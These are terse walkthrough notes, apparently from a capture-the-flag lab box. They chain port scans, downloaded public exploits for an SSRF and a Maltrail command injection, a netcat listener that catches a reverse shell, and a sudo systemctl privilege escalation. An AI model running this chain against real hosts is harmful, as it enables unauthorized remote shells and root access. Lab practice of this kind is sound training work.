rustscan -a 10.10.11.224 -r 0-65535 --ulimit 5000
nmap -Pn -sC -sV -p 22,55555 10.10.11.224
HTTP 55555
http://10.10.11.224:55555/web
Download Exploit
searchsploit -m python/webapps/51675.sh
Run Exploit
/51675.sh http://10.10.11.224:55555/ http://127.0.0.1:80/
Search Exploits
searchsploit maltrail
Download Exploit
searchsploit -m python/webapps/51676.py
Start Netcat Listener
rlwrap nc -nlvvp 4444
Run Exploit
python3 51676.py 10.10.14.4 4444 http://10.10.11.224:55555/nmsxly
Privilege Escalation
sudo -l
sudo systemctl status trail.service
Reference: https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/